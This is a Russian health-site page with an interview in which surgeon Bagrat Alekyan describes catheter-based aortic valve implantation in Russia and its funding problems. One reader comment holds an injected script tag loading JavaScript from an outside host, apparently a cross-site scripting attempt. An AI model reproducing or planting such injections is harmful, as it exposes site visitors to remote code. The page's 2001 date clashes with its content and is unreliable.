Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Баграт Алекян рассказывае...  >>  Баграт Алекян рассказывает о «бескровном» вживлении искусственного аортального клапана в России
 
Обратная связь
 

Баграт Алекян рассказывает о «бескровном» вживлении искусственного аортального клапана в России

Размер шрифта
10 октября 2001 16:40
  • google_analytics: false
  • Нравится

В России проблема – скорее финансовая 
О том, как «бескровное» вживление искусственного аортального клапана проводится в России, рассказывает Баграт Гегамович Алекян, хирург с мировым именем, член-корреспондент РАМН, руководитель отделения рентгенохирургии Научного Центра сердечно-сосудистой хирургии имени Бакулева.

Такие операции в нашем Центре начали проводить в этом году, причем в России пока их делаем только мы. Пользуемся клапанами компании Edwards Lifesciences. Они уже зарегистрированы Росздравнадзором и разрешены к использованию в нашей стране.

Из трех проведенных пока вживлений аортального клапана, два мы выполнили по иной методике, чем та, которую использовали израильские хирурги. Мы вставляли в сердце катетер со свернутым клапаном не через бедренную артерию, а через небольшой кожный разрез в области груди. А вот последняя из трех операций уже осуществлялась по наиболее безопасному для пациента способу. То есть катетер имплантировался через бедренную артерию. Сейчас все трое больных – пожилые люди, которым была противопоказана операция на открытом сердце – чувствуют себя хорошо.

Конечно, возникает вопрос, почему в этой медицинской технологии Россия так отстала от развитых стран. Поверьте, дело не в недостатке талантливых кардиохирургов. Их в России немало. Наши проблемы скорее финансовые. Достаточно сказать, что сегодня стоимость одной «кардиохиргической квоты», выделяемой правительством на оказание россиянам высокотехнологичной медицинской помощи составляет 205 тысяч рублей. А это почти в 6 раз меньше стоимости одного только клапана компании Edwards Lifesciences!

Однако ведущие кардиохирурги России надеются, что Министерство здравоохранения и социального развития выделит средства для решения этой проблемы. А иначе мы никогда не сможем «поставить на поток» операции по вживлению аортального клапана и сделать их доступными тем нашим соотечественникам, которые не могут сами оплатить эту дорогую операцию.

Напоследок подчеркну, что направление транскатетерных пересадок искусственных клапанов сердца – аортального, легочного и митрального – станет главным для прогресса кардиохирургии, и даже, замечу с осторожностью, всей кардилогии  2020-ых годов. 

Под руководством выдающегося ученого и врача Лео Антоновича Бокерия, в Научном Центре сердечно-сосудистой хирургии имени Бакулева уже имплантируется, кроме аортального, также и легочный клапан. И мне бы очень хотелось, чтобы  после внедрения самой сложной их трех, технологии пересадки митрального клапана, Россия не опоздала на столько же лет, как с легочным и аортальным клапаном.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:58

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.